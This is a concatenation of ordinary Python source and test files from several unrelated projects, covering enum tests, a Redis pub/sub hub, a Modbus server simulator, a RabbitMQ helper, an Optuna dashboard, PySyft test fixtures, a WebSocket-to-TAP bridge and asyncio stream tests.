Note that this | is a read-only view of the internal mapping.""" expected_help_output_without_docs = """Help on class Color in module %s: class Color(enum.Enum) | Method resolution order: | Color | enum.Enum | builtins.object | | Data and other attributes defined here: | | blue = <Color.blue: 3> | | green = <Color.green: 2> | | red = <Color.red: 1> | | ---------------------------------------------------------------------- | Data descriptors inherited from enum.Enum: | | name | | value | | ---------------------------------------------------------------------- | Data descriptors inherited from enum.EnumMeta: | | __members__""" class TestStdLib(unittest.TestCase): maxDiff = None class Color(Enum): red = 1 green = 2 blue = 3 def test_pydoc(self): if StrEnum.__doc__ is None: expected_text = expected_help_output_without_docs % __name__ else: expected_text = expected_help_output_with_docs % __name__ output = StringIO() helper = pydoc.Helper(output=output) helper(self.Color) result = output.getvalue().strip() self.assertEqual(result, expected_text) def test_inspect_getmembers(self): values = dict((('__class__', EnumMeta), ('__doc__', 'An enumeration.'), ('__members__', self.Color.__members__), ( '__module__', __name__), ('blue', self.Color.blue), ('green', self.Color.green), ('name', Enum.__dict__['name']), ('red', self.Color.red), ('value', Enum.__dict__['value']))) result = dict(inspect.getmembers(self.Color)) self.assertEqual(values.keys(), result.keys()) failed = False for k in values.keys(): if result[k] != values[k]: print() print( '\n%s\n key: %s\n result: %s\nexpected: %s\n%s\n' % ('=' * 75, k, result[k], values[k], '=' * 75), sep='') failed = True if failed: self.fail('result does not equal expected, see print above') def test_inspect_classify_class_attrs(self): from inspect import Attribute values = [Attribute(name='__class__', kind='data', defining_class= object, object=EnumMeta), Attribute(name='__doc__', kind='data', defining_class=self.Color, object='An 
enumeration.'), Attribute (name='__members__', kind='property', defining_class=EnumMeta, object=EnumMeta.__members__), Attribute(name='__module__', kind ='data', defining_class=self.Color, object=__name__), Attribute (name='blue', kind='data', defining_class=self.Color, object= self.Color.blue), Attribute(name='green', kind='data', defining_class=self.Color, object=self.Color.green), Attribute( name='red', kind='data', defining_class=self.Color, object=self .Color.red), Attribute(name='name', kind='data', defining_class =Enum, object=Enum.__dict__['name']), Attribute(name='value', kind='data', defining_class=Enum, object=Enum.__dict__['value'])] values.sort(key=lambda item: item.name) result = list(inspect.classify_class_attrs(self.Color)) result.sort(key=lambda item: item.name) failed = False for v, r in zip(values, result): if r != v: print('\n%s\n%s\n%s\n%s\n' % ('=' * 75, r, v, '=' * 75), sep='' ) failed = True if failed: self.fail('result does not equal expected, see print above') class MiscTestCase(unittest.TestCase): def test__all__(self): support.check__all__(self, enum) CONVERT_TEST_NAME_D = 5 CONVERT_TEST_NAME_C = 5 CONVERT_TEST_NAME_B = 5 CONVERT_TEST_NAME_A = 5 CONVERT_TEST_NAME_E = 5 CONVERT_TEST_NAME_F = 5 class TestIntEnumConvert(unittest.TestCase): def test_convert_value_lookup_priority(self): test_type = enum.IntEnum._convert('UnittestConvert', ( 'test.test_enum', '__main__')[__name__ == '__main__'], filter= lambda x: x.startswith('CONVERT_TEST_')) self.assertEqual(test_type(5).name, 'CONVERT_TEST_NAME_A') def test_convert(self): test_type = enum.IntEnum._convert('UnittestConvert', ( 'test.test_enum', '__main__')[__name__ == '__main__'], filter= lambda x: x.startswith('CONVERT_TEST_')) self.assertEqual(test_type.CONVERT_TEST_NAME_F, test_type. 
CONVERT_TEST_NAME_A) self.assertEqual(test_type.CONVERT_TEST_NAME_B, 5) self.assertEqual(test_type.CONVERT_TEST_NAME_C, 5) self.assertEqual(test_type.CONVERT_TEST_NAME_D, 5) self.assertEqual(test_type.CONVERT_TEST_NAME_E, 5) self.assertEqual([name for name in dir(test_type) if name[0:2] not in ('CO', '__')], [], msg='Names other than CONVERT_TEST_* found.') if __name__ == '__main__': unittest.main()
mercury.py
# coding: utf-8
import redis
import pickle
import logging

# Module-level logger; the hosting application is expected to attach handlers.
logger = logging.getLogger("mercury")
logger.setLevel(logging.DEBUG)


class RedisNotConnected(Exception):
    """Raised when the initial connection to the redis server fails.

    Derives from Exception (not BaseException, as before) so generic
    ``except Exception`` handlers in callers can catch it.
    """

    def __init__(self, host, port):
        err = "Error connecting to redis {}:{}".format(host, port)
        super().__init__(err)


class Singleton(type):
    """Metaclass that makes every class using it a process-wide singleton."""

    _instances = {}

    def __call__(cls, *args, **kwargs):
        if cls not in cls._instances:
            cls._instances[cls] = super(Singleton, cls).__call__(*args, **kwargs)
        return cls._instances[cls]


class MercuryApp(metaclass=Singleton):
    """A redis pub/sub message hub.  A MercuryApp is a Singleton.

    Messages are pickled on publish and unpickled on receipt; handlers are
    dispatched per channel, with :meth:`on_message` as the fallback.
    """

    def __init__(
        self, name=None, redis_host="localhost", port=6379, redis_password=None
    ):
        super().__init__()
        try:
            self.__redis = redis.StrictRedis(
                host=redis_host,
                port=port,
                password=redis_password,
                decode_responses=True,
                socket_connect_timeout=3,
            )
            if name is None:
                # Generate a random client name when none was supplied.
                import hashlib
                import time
                import random
                name = hashlib.md5()
                name.update(str(time.time() + random.random()).encode())
                name = name.hexdigest()
            self.__redis.client_setname(name)
            self.name = name
            # Force a round-trip so a bad host/port fails here, not later.
            self.__redis.client_list()
            self.__pubsub = self.__redis.pubsub()
            self.__handlers = {}
            self.started = False
        except Exception as e:
            logger.error("{}".format(e))
            # Chain the original error so the root cause stays visible.
            raise RedisNotConnected(host=redis_host, port=port) from e

    def add_handler(self, channel, handler):
        """Register ``handler`` to receive unpickled messages from ``channel``."""
        self.__handlers[channel] = handler

    def publish(self, channel, message):
        """Pickle ``message`` and publish it on ``channel``."""
        self.__redis.publish(channel, pickle.dumps(message))

    def subscribe(self, channel):
        self.__pubsub.subscribe(channel)

    def psubscribe(self, pattern):
        self.__pubsub.psubscribe(pattern)

    def on_message(self, msg):
        """Fallback callback for channels without a registered handler."""
        print("on_message:", msg)

    def start(self):
        """
        Start a thread, keep delivering messages to handlers
        :return:
        """
        import threading
        threading.Thread(target=self.run_in_thread, daemon=True).start()

    def run_in_thread(self):
        # Daemon worker: pump messages forever (see start()).
        while True:
            self.__next__()

    def __iter__(self):
        return self

    def __next__(self):
        """Poll for one message; deliver it to its handler and return it."""
        msg = self.__pubsub.get_message(timeout=5)
        if msg is not None:
            if msg['type'] == 'message' or msg['type'] == 'pmessage':
                data = None
                try:
                    # NOTE(review): with decode_responses=True the payload
                    # arrives as str, and pickle.loads(str) raises TypeError
                    # (caught below), so only bytes payloads round-trip —
                    # confirm whether decode_responses should be False.
                    # SECURITY: pickle.loads must only see trusted peers' data.
                    data = pickle.loads(msg['data'])
                except TypeError:
                    logger.error("Unexpected Message Type Received: {}, a pickled bytes is required".format(msg['data']))
                if data:
                    if msg["channel"] in self.__handlers:
                        handler = self.__handlers[msg["channel"]]
                        handler(data)
                    else:
                        self.on_message(data)
                return data
server.py
#Import pymodbus components
from pymodbus.server.sync import StartTcpServer, StartSerialServer
from pymodbus.device import ModbusDeviceIdentification
from pymodbus.datastore import ModbusSequentialDataBlock, ModbusSparseDataBlock
from pymodbus.datastore import ModbusSlaveContext, ModbusServerContext
from pymodbus.transaction import ModbusRtuFramer
#Import local scripts componenets
import xml.etree.ElementTree as ET
from threading import Thread
import time, logging, sys
from client import validateXml


class Server:
    """Server simulator that serves on given ip and port and generates signals
    based on xml file"""

    # Maps validateXml() error codes to human readable messages.
    # (Also fixes the 'devicData' typo of the original message: the XML node
    # actually parsed below is 'deviceData'.)
    _VALIDATION_ERRORS = {
        -1: 'deviceData node missing',
        -2: 'modbus type not set',
        -3: 'ip address missing',
        -4: 'comm port missing',
        -5: 'baud rate missing',
        -10: 'No register mappings',
        -11: 'Duplicated Input register mapping',
        -12: 'Duplicated Discrete input mapping',
        -13: 'Duplicated Holding register mapping',
        -14: 'Duplicated Coil mapping',
    }

    def __init__(self, xmlFile):
        """Validate and parse *xmlFile*, then build the modbus data store and
        device identity. Raises Exception on any validation error."""
        self.xml = xmlFile
        validationInt = validateXml(self.xml)
        if validationInt in self._VALIDATION_ERRORS:
            raise Exception('XML File Error: ' + self._VALIDATION_ERRORS[validationInt])

        self.xmlData = self._parseXml()
        registers = self.xmlData.get('registers')
        store = ModbusSlaveContext(
            di=ModbusSequentialDataBlock(0, registers.get('di')),
            ir=ModbusSequentialDataBlock(0, registers.get('ir')),
            co=ModbusSequentialDataBlock(0, registers.get('co')),
            hr=ModbusSequentialDataBlock(0, registers.get('hr')),
            zero_mode=True)
        self.context = ModbusServerContext(slaves=store, single=True)

        self.deviceIdentity = ModbusDeviceIdentification()
        self.deviceIdentity.VendorName = self.xmlData.get("vendorName")
        self.deviceIdentity.ProductCode = self.xmlData.get("productCode")
        self.deviceIdentity.VendorUrl = self.xmlData.get("vendorUrl")
        self.deviceIdentity.ProductName = self.xmlData.get("productName")
        self.deviceIdentity.ModelName = self.xmlData.get("modelName")
        # BUG FIX: _parseXml stores the key as 'version' (lower case); the
        # original read "Version" and therefore always assigned None.
        self.deviceIdentity.MajorMinorRevision = self.xmlData.get("version")

    @staticmethod
    def _parseRegisterBlock(registers, tag):
        """Parse one register-type node (<di>/<ir>/<hr>/<co>) into its list of
        initial values; returns [0] when the node is absent."""
        node = registers.find(tag)
        if node is None:
            return [0]
        values = [0] * 65535
        for mapping in node.findall('mapping'):
            ix = int(mapping.get('register'))
            if mapping.get('initialValue') is not None:
                values[ix] = int(mapping.get('initialValue'))
        return values

    def _parseXml(self):
        """Parses xml file and validates the registers"""
        data = {}
        tree = ET.parse(self.xml)
        root = tree.getroot()
        registers = root.find('registers')

        # One shared parser replaces the four duplicated mapping loops.
        data['registers'] = {
            'di': self._parseRegisterBlock(registers, 'di'),
            'ir': self._parseRegisterBlock(registers, 'ir'),
            'hr': self._parseRegisterBlock(registers, 'hr'),
            'co': self._parseRegisterBlock(registers, 'co'),
        }

        #Parse device data
        deviceData = root.find('deviceData')
        data['vendorName'] = deviceData.get("vendorName", '')
        data['productCode'] = deviceData.get("productCode", '')
        data['vendorUrl'] = deviceData.get("vendorUrl", '')
        data['productName'] = deviceData.get("productName", '')
        data['modelName'] = deviceData.get("modelName", '')
        data['version'] = deviceData.get("version", '0.0-1')
        data['modbusType'] = deviceData.get('modbusType')
        data['com'] = deviceData.get("com", None)
        data['baud'] = int(deviceData.get("baud", "9600"))
        data['stopbits'] = int(deviceData.get("stopbits", "1"))
        data['bytesize'] = int(deviceData.get("bytesize", "8"))
        data['parity'] = deviceData.get("parity", "E")
        data['ip'] = deviceData.get("ip", "localhost")
        data['port'] = int(deviceData.get("port", 502))
        data['timeout'] = int(deviceData.get('timeout', "2"))
        return data

    def run_server(self, callback=None, debug=True):
        """Runs the modbus tcp or rtu server with given register information.
        If *callback* is given it is started as a daemon thread receiving the
        server context (e.g. the incrementer simulator below)."""
        if debug:
            logging.basicConfig()
            log = logging.getLogger()
            log.setLevel(logging.DEBUG)
        try:
            #Data callback function will be executed as a separate thread
            if callback is not None:
                thread = Thread(target=callback, args=(self.context,), daemon=True)
                thread.start()
            if self.xmlData.get('modbusType') == 'tcp/ip':
                print(f"Running server on IP: {self.xmlData.get('ip')} and port {self.xmlData.get('port')}")
                StartTcpServer(self.context,
                               identity=self.deviceIdentity,
                               address=(self.xmlData.get('ip'), self.xmlData.get('port')))
            elif self.xmlData.get('modbusType') == 'rtu':
                print(f"Running server on COM: {self.xmlData.get('com')} and baudrate {self.xmlData.get('baud')}")
                StartSerialServer(self.context,
                                  timeout=self.xmlData.get('timeout'),
                                  framer=ModbusRtuFramer,
                                  identity=self.deviceIdentity,
                                  port=self.xmlData.get('com'),
                                  stopbits=self.xmlData.get('stopbits'),
                                  bytesize=self.xmlData.get('bytesize'),
                                  parity=self.xmlData.get('parity'),
                                  baudrate=self.xmlData.get('baud'))
        except KeyboardInterrupt:
            print('Server stopped')


#Helpfull data simulators
def incrementer(context):
    """
    A worker process that runs on a given cycle and updates live values of the context.
    """
    while True:
        updateStartTime = time.perf_counter()
        #Get values from only the first slave/ multiple slaves unsupported
        #Toggle values of coils (fc 1) and discrete inputs (fc 2)
        for fc in (1, 2):
            bits = context[0].getValues(fc, 0, count=65535)
            context[0].setValues(fc, 0, [v - 1 if v == 1 else v + 1 for v in bits])
        #Increment holding registers (fc 3) and input registers (fc 4)
        for fc in (3, 4):
            regs = context[0].getValues(fc, 0, count=65535)
            context[0].setValues(fc, 0, [v + 1 for v in regs])
        #Calculate the latency
        latency_ms = int((time.perf_counter() - updateStartTime) * 1000)
        #if cycle time is faster than latency, go to sleep to match the cycle time
        if latency_ms < 2000:
            time.sleep((2000 - latency_ms) / 1000)


####MAIN APP#######
if __name__ == '__main__':
    #handle arguments to the script; default: no callback, no debug
    callback = None
    debug = False
    opts = [opt for opt in sys.argv[1:] if opt.startswith("-")]
    args = [arg for arg in sys.argv[1:] if not arg.startswith("-")]
    #xml file path must be first
    xmlFilePath = args[0]
    if '-i' in opts or '--increment' in opts:
        callback = incrementer
    if '-d' in opts or '--debug' in opts:
        debug = True
    sim = Server(xmlFilePath)
    sim.run_server(callback=callback, debug=debug)
rabbit.py
# -*- coding: utf-8 -*-
"""
Created on 21 August 2017

@author: dgrossman
"""
import logging
import threading
import time
from functools import partial

import pika


class Rabbit:
    ''' Base Class for RabbitMQ '''

    def __init__(self):
        self.logger = logging.getLogger('rabbit')
        self.connection = None
        self.channel = None
        self.mq_recv_thread = None
        self.queue_name = 'poseidon_main'

    def close(self):
        # Only tear down a connection that was actually established.
        if self.connection:
            self.connection.close()

    def make_rabbit_connection(self, host, port, exchange, keys, total_sleep=float('inf')):  # pragma: no cover
        '''
        Connects to rabbitmq using the given hostname,
        exchange, and queue. Retries on failure until success.
        Binds routing keys appropriate for module, and returns
        the channel and connection.
        '''
        wait = True
        do_rabbit = True

        # Retry until connected or the sleep budget runs out.
        while wait and total_sleep > 0:
            try:
                self.connection = pika.BlockingConnection(
                    pika.ConnectionParameters(host=host, port=port)
                )
                self.channel = self.connection.channel()
                self.channel.exchange_declare(
                    exchange=exchange, exchange_type='topic')
                self.channel.queue_declare(
                    queue=self.queue_name, exclusive=False, durable=True)
                self.logger.info(f'Connected to {host} rabbitmq...')
                wait = False
            except Exception as e:
                self.logger.debug(
                    f'Waiting for connection to {host} rabbitmq...')
                time.sleep(2)
                total_sleep -= 2
                wait = True

        # Budget exhausted without connecting: report failure to the caller.
        if wait:
            do_rabbit = False

        # Bind each requested routing key to our queue.
        if self.channel is not None and isinstance(keys, list) and not wait:
            for key in keys:
                self.logger.debug(
                    f'Array adding key:{key} to rabbitmq channel')
                self.channel.queue_bind(
                    exchange=exchange, queue=self.queue_name, routing_key=key)
        if isinstance(keys, str) and not wait:
            self.logger.debug(
                f'String adding key:{keys} to rabbitmq channel')
            self.channel.queue_bind(
                exchange=exchange, queue=self.queue_name, routing_key=keys)

        return do_rabbit

    def start_channel(self, mycallback, m_queue):
        ''' Handle threading for messagetype '''
        self.logger.debug(f'About to start channel {self.channel}')
        # Consume on a dedicated thread; mycallback receives q=m_queue.
        self.channel.basic_consume(
            self.queue_name,
            partial(mycallback, q=m_queue))
        self.mq_recv_thread = threading.Thread(
            target=self.channel.start_consuming)
        self.mq_recv_thread.start()
dashboard.py
try:
    import bokeh.command.bootstrap
    import bokeh.document  # NOQA
    import bokeh.layouts
    import bokeh.models
    import bokeh.models.widgets
    import bokeh.plotting
    import bokeh.themes
    import tornado.gen

    _available = True
except ImportError as e:
    _available = False
    _import_error = e

import collections
import threading
import time

import numpy as np

import optuna.logging
import optuna.structs
import optuna.study
from optuna import type_checking

if type_checking.TYPE_CHECKING:
    from typing import Any  # NOQA
    from typing import Dict  # NOQA
    from typing import List  # NOQA
    from typing import Optional  # NOQA

# Globals used to hand the mode/study over to the Bokeh subprocess (see _serve).
_mode = None  # type: Optional[str]
_study = None  # type: Optional[optuna.study.Study]

_HEADER_FORMAT = """
<style>
body {{
    margin: 20px;
}}
h1, p {{
    margin: 10px 0px;
}}
</style>

<h1>Optuna Dashboard (Beta)</h1>
<p>
<b>Study name:</b> {study_name}<br>
</p>
"""

_DATETIME_FORMAT = "%Y-%m-%d %H:%M:%S"

if _available:

    class _CompleteTrialsWidget(object):
        """Scatter of objective values plus a running best-value line."""

        def __init__(self, trials, direction):
            # type: (List[optuna.structs.FrozenTrial], optuna.structs.StudyDirection) -> None

            complete_trials = [
                trial for trial in trials if trial.state == optuna.structs.TrialState.COMPLETE
            ]
            self.trial_ids = set([trial._trial_id for trial in complete_trials])
            self.direction = direction
            values = [trial.value for trial in complete_trials]
            if direction == optuna.structs.StudyDirection.MINIMIZE:
                best_values = np.minimum.accumulate(values, axis=0)
            else:
                best_values = np.maximum.accumulate(values, axis=0)

            self.cds = bokeh.models.ColumnDataSource(
                {
                    "#": list(range(len(complete_trials))),
                    "value": values,
                    "best_value": best_values,
                }
            )
            if complete_trials:
                self.best_value = best_values[-1]
            elif direction == optuna.structs.StudyDirection.MINIMIZE:
                self.best_value = np.inf
            else:
                # BUG FIX: the identity element for a running max is -inf.
                # The original used +inf for both directions, so a maximizing
                # study with no finished trials reported inf forever.
                self.best_value = -np.inf

        def create_figure(self):
            # type: () -> bokeh.plotting.Figure

            figure = bokeh.plotting.figure(height=150)
            figure.circle(x="#", y="value", source=self.cds, alpha=0.3, color="navy")
            figure.line(x="#", y="best_value", source=self.cds, color="firebrick")
            figure.xaxis[0].axis_label = "Number of Trials"
            figure.yaxis[0].axis_label = "Objective Value"
            return figure

        def update(self, new_trials):
            # type: (List[optuna.structs.FrozenTrial]) -> None

            # Stream only trials we haven't plotted yet.
            stream_dict = collections.defaultdict(list)  # type: Dict[str, List[Any]]

            for trial in new_trials:
                if trial.state != optuna.structs.TrialState.COMPLETE:
                    continue
                if trial._trial_id in self.trial_ids:
                    continue
                stream_dict["#"].append(len(self.trial_ids))
                stream_dict["value"].append(trial.value)
                if self.direction == optuna.structs.StudyDirection.MINIMIZE:
                    self.best_value = min(self.best_value, trial.value)
                else:
                    self.best_value = max(self.best_value, trial.value)
                stream_dict["best_value"].append(self.best_value)
                self.trial_ids.add(trial._trial_id)

            if stream_dict:
                self.cds.stream(stream_dict)

    class _AllTrialsWidget(object):
        """Table of every trial, kept in sync via CDS patch/stream."""

        def __init__(self, trials):
            # type: (List[optuna.structs.FrozenTrial]) -> None

            self.cds = bokeh.models.ColumnDataSource(self.trials_to_dict(trials))

        def create_table(self):
            # type: () -> bokeh.models.widgets.DataTable

            return bokeh.models.widgets.DataTable(
                source=self.cds,
                columns=[
                    bokeh.models.widgets.TableColumn(field=field, title=field)
                    for field in [
                        "number",
                        "state",
                        "value",
                        "params",
                        "datetime_start",
                        "datetime_complete",
                    ]
                ],
            )

        def update(
            self,
            old_trials,  # type: List[optuna.structs.FrozenTrial]
            new_trials,  # type: List[optuna.structs.FrozenTrial]
        ):
            # type: (...) -> None

            # Patch rows that changed in place, then stream the new tail.
            modified_indices = []
            modified_trials = []
            for i, old_trial in enumerate(old_trials):
                new_trial = new_trials[i]
                if old_trial != new_trial:
                    modified_indices.append(i)
                    modified_trials.append(new_trial)

            patch_dict = self.trials_to_dict(modified_trials)
            patch_dict = {k: list(zip(modified_indices, v)) for k, v in patch_dict.items()}
            self.cds.patch(patch_dict)

            self.cds.stream(self.trials_to_dict(new_trials[len(old_trials):]))

        @staticmethod
        def trials_to_dict(trials):
            # type: (List[optuna.structs.FrozenTrial]) -> Dict[str, List[Any]]

            return {
                "number": [trial.number for trial in trials],
                "state": [trial.state.name for trial in trials],
                "value": [trial.value for trial in trials],
                "params": [str(trial.params) for trial in trials],
                "datetime_start": [
                    trial.datetime_start.strftime(_DATETIME_FORMAT)
                    if trial.datetime_start is not None
                    else None
                    for trial in trials
                ],
                "datetime_complete": [
                    trial.datetime_complete.strftime(_DATETIME_FORMAT)
                    if trial.datetime_complete is not None
                    else None
                    for trial in trials
                ],
            }

    class _DashboardApp(object):
        """Bokeh document factory; optionally polls the study on a thread."""

        def __init__(self, study, launch_update_thread):
            # type: (optuna.study.Study, bool) -> None

            self.study = study
            self.launch_update_thread = launch_update_thread
            self.lock = threading.Lock()

        def __call__(self, doc):
            # type: (bokeh.document.Document) -> None

            self.doc = doc
            self.current_trials = (
                self.study.trials
            )  # type: Optional[List[optuna.structs.FrozenTrial]]
            self.new_trials = None  # type: Optional[List[optuna.structs.FrozenTrial]]
            self.complete_trials_widget = _CompleteTrialsWidget(
                self.current_trials, self.study.direction
            )
            self.all_trials_widget = _AllTrialsWidget(self.current_trials)

            self.doc.title = "Optuna Dashboard (Beta)"
            header = _HEADER_FORMAT.format(study_name=self.study.study_name)
            self.doc.add_root(
                bokeh.layouts.layout(
                    [
                        [bokeh.models.widgets.Div(text=header)],
                        [self.complete_trials_widget.create_figure()],
                        [self.all_trials_widget.create_table()],
                    ],
                    sizing_mode="scale_width",
                )
            )

            if self.launch_update_thread:
                thread = threading.Thread(target=self.thread_loop)
                thread.daemon = True
                thread.start()

        def thread_loop(self):
            # type: () -> None

            while True:
                time.sleep(1)
                new_trials = self.study.trials
                with self.lock:
                    # Schedule the UI callback at most once per pending batch.
                    need_to_add_callback = self.new_trials is None
                    self.new_trials = new_trials
                    if need_to_add_callback:
                        self.doc.add_next_tick_callback(self.update_callback)

        @tornado.gen.coroutine
        def update_callback(self):
            # type: () -> None

            with self.lock:
                current_trials = self.current_trials
                new_trials = self.new_trials
                self.current_trials = self.new_trials
                self.new_trials = None

            assert current_trials is not None
            assert new_trials is not None
            self.complete_trials_widget.update(new_trials)
            self.all_trials_widget.update(current_trials, new_trials)


def _check_bokeh_availability():
    # type: () -> None

    if not _available:
        raise ImportError(
            "Bokeh is not available. Please install Bokeh to use the dashboard. "
            "Bokeh can be installed by executing `$ pip install bokeh`. "
            "For further information, please refer to the installation guide of Bokeh. "
            "(The actual import error is as follows: " + str(_import_error) + ")"
        )


def _show_experimental_warning():
    # type: () -> None

    logger = optuna.logging.get_logger(__name__)
    logger.warning("Optuna dashboard is still highly experimental. Please use with caution!")


def _get_this_source_path():
    # type: () -> str

    path = __file__

    # Sometimes __file__ points to a *.pyc file, but Bokeh doesn't accept it.
    if path.endswith(".pyc"):
        path = path[:-1]
    return path


def _serve(study, bokeh_allow_websocket_origins):
    # type: (optuna.study.Study, List[str]) -> None

    global _mode, _study

    _check_bokeh_availability()
    _show_experimental_warning()

    # We want to pass the mode (launching a server? or, just writing an HTML?) and a target study
    # to our Bokeh app. Unfortunately, as we are using `bokeh.command.bootstrap.main` to launch
    # our Bokeh app, we cannot directly pass Python objects to it. Therefore, we have no choice but
    # to use global variables to pass them.
    _mode = "serve"
    _study = study

    # TODO(akiba): Stop using Bokeh's CLI entry point, and start the HTTP server by ourselves.
    # This is not a very clean way to launch Bokeh server.
    # Another seemingly better way is to
    # instantiate and launch `bokeh.server.server.Server` by ourselves. However, in this way,
    # for some reason, we found that the CDS update is not reflected to browsers, at least on Bokeh
    # version 0.12.15. In addition, we will need to do many configuration to servers, which can be
    # done automatically with the following one line. So, for now, we decided to use this way.
    command = ["bokeh", "serve", "--show", _get_this_source_path()]
    for bokeh_allow_websocket_origin in bokeh_allow_websocket_origins:
        command.extend(["--allow-websocket-origin", bokeh_allow_websocket_origin])
    bokeh.command.bootstrap.main(command)


def _write(study, out_path):
    # type: (optuna.study.Study, str) -> None

    global _mode, _study

    _check_bokeh_availability()
    _show_experimental_warning()

    _mode = "html"
    _study = study
    bokeh.command.bootstrap.main(["bokeh", "html", _get_this_source_path(), "-o", out_path])


def _run():
    # type: () -> None

    # Please note that `_study` and `optuna.dashboard._study` are different here. Here, this module
    # is loaded inside Bokeh, and thus it is not `optuna.dashboard`, but `bk_script_????`.
    study = optuna.dashboard._study
    mode = optuna.dashboard._mode

    assert study is not None
    app = _DashboardApp(study, launch_update_thread=(mode == "serve"))
    doc = bokeh.plotting.curdoc()
    app(doc)


if __name__.startswith("bk_script_"):
    # Here, this module is loaded inside Bokeh. Therefore, we should launch the Bokeh app.
    _run()
conftest.py
import pytest
import torch
from multiprocessing import Process
import os
import sys
import syft
from syft.grid.clients.dynamic_fl_client import DynamicFLClient
from syft.grid.public_grid import PublicGridNetwork
import gridnode
from . import IDS, PORTS
import time
import requests
import json
from gevent import pywsgi
from geventwebsocket.handler import WebSocketHandler


@pytest.fixture()
def start_proc():  # pragma: no cover
    """ helper function for spinning up a websocket participant """

    def _start_proc(participant, kwargs):
        def target():
            instance = participant(**kwargs)
            instance.start()

        proc = Process(target=target)
        proc.start()
        return proc

    return _start_proc


@pytest.fixture(scope="session", autouse=True)
def node_infos():
    # Pair each grid-node identifier with the port it should listen on.
    return zip(IDS, PORTS)


@pytest.fixture(scope="session", autouse=True)
def init_nodes(node_infos):
    BASEDIR = os.path.dirname(os.path.dirname(__file__))

    def setUpNode(port, node_id):
        from gridnode import create_app as ws_create_app

        app = ws_create_app(node_id, debug=False, database_url=None)
        server = pywsgi.WSGIServer(("", int(port)), app, handler_class=WebSocketHandler)
        server.serve_forever()

    # Launch one gevent-backed grid node process per (id, port) pair.
    workers = []
    for node_id, port in node_infos:
        worker = Process(target=setUpNode, args=(port, node_id))
        worker.start()
        workers.append(worker)

    time.sleep(5)
    yield

    for worker in workers:
        worker.terminate()


def create_websocket_client(hook, port, id):
    """Build a DynamicFLClient pointed at the local node on *port*."""
    return DynamicFLClient(hook, "http://localhost:" + port + "/", id=id)


@pytest.fixture(scope="function")
def connected_node(hook):
    clients = {}
    for node_id, port in zip(IDS, PORTS):
        clients[node_id] = create_websocket_client(hook, port, node_id)

    yield clients

    # Tear down each client with a short pause between disconnects.
    for node_id in clients:
        clients[node_id].close()
        time.sleep(0.1)


@pytest.fixture(scope="session", autouse=True)
def hook():
    return syft.TorchHook(torch)
server.py
import asyncio
import uvloop
from module.devices import ServerVirtualDevice
import threading
import json

# Use uvloop's faster event-loop implementation for all loops created below.
asyncio.set_event_loop_policy(uvloop.EventLoopPolicy())

from autobahn.asyncio.websocket import WebSocketServerProtocol, \
    WebSocketServerFactory


class MyServerFactory(WebSocketServerFactory):
    """WebSocket server factory that bridges a virtual network device.

    Frames read from the device are broadcast to every connected client,
    and binary frames received from clients are written back to the device.
    """

    def __init__(self):
        WebSocketServerFactory.__init__(self, "ws://127.0.0.1:9000")
        self.clients = set()
        self.virtual_device = ServerVirtualDevice()
        # assumes get_device() returns a file-like object supporting
        # read()/write() of raw frames (e.g. a TAP device) — TODO confirm
        self.device = self.virtual_device.get_device()

    def listen_tap(self):
        """Blocking loop: forward every frame from the device to all clients.

        Intended to run in a dedicated thread (see `__main__` below) since
        `self.device.read` blocks.
        """
        while True:
            data = self.device.read(1500)  # 1500 = typical Ethernet MTU
            print(data)
            self.broadcast(data, True)

    def register(self, client):
        """Track a newly connected client (idempotent)."""
        if client not in self.clients:
            print("registered client {}".format(client.peer))
            self.clients.add(client)

    def unregister(self, client):
        """Stop tracking a disconnected client (no-op if unknown)."""
        if client in self.clients:
            print("unregistered client {}".format(client.peer))
            self.clients.remove(client)

    def broadcast(self, payload, isBinary):
        """Send `payload` to every currently connected client."""
        # if isBinary:
        #     print("Binary message received: {0} bytes".format(len(payload)))
        # else:
        #     print("Text message received: {0}".format(payload.decode('utf8')))
        for c in self.clients:
            # c.sendMessage(msg.encode('utf8'))
            c.sendMessage(payload, isBinary)


class MyServerProtocol(WebSocketServerProtocol):
    """Per-connection protocol: registers with the factory and relays frames."""

    def onConnect(self, request):
        print("Client connecting: {0}".format(request.peer))

    def onOpen(self):
        print("WebSocket connection open.")
        self.factory.register(self)
        print(self.factory.clients)

    def onMessage(self, payload, isBinary):
        # Binary frames are raw device traffic: write to the device and
        # re-broadcast to the other clients. Text frames are parsed as JSON
        # but currently only logged.
        if isBinary:
            print(payload)
            self.factory.device.write(payload)
            self.factory.broadcast(payload, isBinary)
        else:
            data = json.loads(payload.decode('utf8'))
            print("Text message received: {0}".format(payload.decode('utf8')))

    def onClose(self, wasClean, code, reason):
        self.factory.unregister(self)
        print("WebSocket connection closed: {0}".format(reason))


if __name__ == '__main__':

    factory = MyServerFactory()
    factory.protocol = MyServerProtocol

    loop = asyncio.get_event_loop()
    coro = loop.create_server(factory, '0.0.0.0', 9000)
    server = loop.run_until_complete(coro)

    try:
        # The device-reader runs in a background thread because its read()
        # call blocks; broadcasts go to clients managed by the asyncio loop.
        b = threading.Thread(name='background', target=factory.listen_tap)
        b.start()
        loop.run_forever()
    except KeyboardInterrupt:
        pass
    finally:
        server.close()
        loop.close()
test_streams.py
"""Tests for streams.py."""

import gc
import os
import queue
import socket
import sys
import threading
import unittest
from unittest import mock
try:
    import ssl
except ImportError:
    ssl = None

import asyncio
from asyncio import test_utils


class StreamReaderTests(test_utils.TestCase):
    # Tests drive StreamReader coroutines to completion with
    # loop.run_until_complete; data is injected either up-front via
    # feed_data or asynchronously via loop.call_soon callbacks.

    DATA = b'line1\nline2\nline3\n'

    def setUp(self):
        self.loop = asyncio.new_event_loop()
        self.set_event_loop(self.loop)

    def tearDown(self):
        # just in case if we have transport close callbacks
        test_utils.run_briefly(self.loop)

        self.loop.close()
        gc.collect()
        super().tearDown()

    @mock.patch('asyncio.streams.events')
    def test_ctor_global_loop(self, m_events):
        stream = asyncio.StreamReader()
        self.assertIs(stream._loop, m_events.get_event_loop.return_value)

    def _basetest_open_connection(self, open_connection_fut):
        reader, writer = self.loop.run_until_complete(open_connection_fut)
        writer.write(b'GET / HTTP/1.0\r\n\r\n')
        f = reader.readline()
        data = self.loop.run_until_complete(f)
        self.assertEqual(data, b'HTTP/1.0 200 OK\r\n')
        f = reader.read()
        data = self.loop.run_until_complete(f)
        self.assertTrue(data.endswith(b'\r\n\r\nTest message'))
        writer.close()

    def test_open_connection(self):
        with test_utils.run_test_server() as httpd:
            conn_fut = asyncio.open_connection(*httpd.address,
                                               loop=self.loop)
            self._basetest_open_connection(conn_fut)

    @unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'No UNIX Sockets')
